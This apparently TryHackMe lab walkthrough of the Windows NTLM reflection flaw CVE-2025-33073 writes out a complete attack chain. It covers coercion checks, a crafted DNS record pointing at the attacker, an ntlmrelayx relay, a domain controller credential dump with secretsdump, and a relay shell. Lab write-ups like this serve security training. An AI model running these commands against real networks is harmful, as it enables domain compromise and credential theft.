CVE-2025-33073

,

NTLM Reflection: CVE-2025-33073 - TryHackMe Walkthrough

Introduction

This comprehensive walkthrough covers CVE-2025-33073, an NTLM reflection vulnerability that allows attackers to relay authentication to compromised systems. In this TryHackMe writeup, we’ll explore how to identify and exploit this critical vulnerability on a Windows Active Directory environment. This CVE-2025-33073 walkthrough demonstrates the complete attack chain from reconnaissance to credential dumping, making it an essential resource for penetration testers and security professionals looking to understand NTLM relay attacks.

Initial Reconnaissance - Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE SERVICE      REASON  VERSION
88/tcp    open  kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-11-21 18:52:32Z)
389/tcp   open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: reflection.thm0., Site: Default-First-Site-Name)
464/tcp   open  kpasswd5?    syn-ack
593/tcp   open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack
3269/tcp  open  tcpwrapped   syn-ack
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       syn-ack .NET Message Framing
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc        syn-ack Microsoft Windows RPC

Initial Credentials

We already have a set of credentials to work with:

1
sawan:R3flect0r

Testing for Coercion Vulnerabilities

First, we’ll check for authentication coercion vulnerabilities using the NetExec coerce_plus module:

1
netexec smb 10.49.132.212 -u sawan -p R3flect0r -M coerce_plus

The scan reveals that the target has four different coercion methods available:

1
2
3
4
VULNERABLE, DFSCoerce
VULNERABLE, PetitPotam
VULNERABLE, PrinterBug
VULNERABLE, PrinterBug

Important Note: The target also has signing:False, which is crucial for this attack. Without SMB signing disabled, we cannot proceed with the NTLM reflection attack.

Testing for NTLM Reflection Vulnerability

Now with the latest NetExec version, we can check if the target is vulnerable to NTLM Reflection (CVE-2025-33073):

1
netexec smb 10.49.132.212 -u sawan -p R3flect0r -M ntlm_reflection

The result confirms the vulnerability:

1
VULNERABLE (can relay SMB to any protocol on 10.49.132.212)

Exploitation: Creating the Malicious DNS Entry

For the exploitation phase, we need to create a specially crafted DNS entry that points to our attacking machine. This entry includes Marshalled data to trick the LsapCheckMarshalledTargetInfo function. After the function clears the Marshalled data, we create an entry with our IP address and a hostname of “localhost”.

1
python3 dnstool.py -u 'reflection.thm'\\'sawan' -p 'R3flect0r' --action add --record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA --data <ATTACKER_IP> <TARGET_IP>

Verifying the DNS Entry

Next, we verify that the DNS entry has been successfully created:

1
python3 dnstool.py -u 'reflection.thm'\\'sawan' -p 'R3flect0r' --action query --record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA --data <ATTACKER_IP> <TARGET_IP>

We should receive the following confirmation:

1
2
3
4
5
6
[+] Bind OK
[+] Found record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
DC=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=reflection.thm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=reflection,DC=thm
[+] Record entry:
 - Type: 1 (A) (Serial: 172)
 - Address: 192.168.139.150

Setting Up the NTLM Relay

Now we start ntlmrelayx to listen for SMB connections and point to the victim machine. Since this is a Domain Controller (not a workstation), we need to use SOCKS to dump the NTDS.dit database:

1
sudo ntlmrelayx.py -t smb://10.49.132.212 -smb2support -socks

Triggering the Coercion

In another terminal, we initiate the coercion attack:

1
netexec smb 10.49.132.212 -u sawan -p R3flect0r -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

Dumping Domain Credentials

Finally, after the relay is established, we use proxychains to dump all credentials from the Domain Controller. Make sure your /etc/proxychains4.conf is configured correctly with: socks4 127.0.0.1 1080

1
proxychains4 -q impacket-secretsdump 10.49.132.212 -no-pass -just-dc -use-vss

Alternative Exploitation Methods

There are additional ways to abuse this CVE depending on the target type.

For Workstations: Dumping SAM

1
ntlmrelayx.py -t smb://10.10.119.187 -smb2support --no-http-server

Getting an Interactive Shell

1
ntlmrelayx.py -t smb://10.10.119.187 -smb2support -i

Then connect to the shell:

1
nc 127.0.0.1 11000

Further Reading and Resources

For an in-depth technical analysis of how this exploit works, including Kerberos-based attacks, check out this excellent post:

NTLM Reflection is Dead, Long Live NTLM Reflection - Synacktiv

Try this challenge yourself on TryHackMe:
NTLM Reflection CVE-2025-33073 Room

Conclusion

CVE-2025-33073 demonstrates the critical importance of enabling SMB signing and properly securing authentication protocols in Windows environments. This TryHackMe walkthrough showcases how a seemingly minor misconfiguration can lead to complete domain compromise. Always ensure SMB signing is enforced and regularly audit your Active Directory environment for such vulnerabilities.